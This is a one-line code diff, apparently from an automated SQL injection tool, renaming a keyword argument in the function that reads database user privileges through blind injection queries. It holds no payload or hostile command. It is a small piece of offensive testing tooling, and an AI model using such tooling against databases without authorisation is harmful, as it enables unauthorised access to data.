@@ -500,7 +500,7 @@ class Users: query = rootQuery.blind.query % (index, user) else: query = rootQuery.blind.query % (user, index) - privilege = inject.getValue(query, inband=False, error=False) + privilege = inject.getValue(query, union=False, error=False) # In PostgreSQL we get 1 if the privilege is True, # 0 otherwise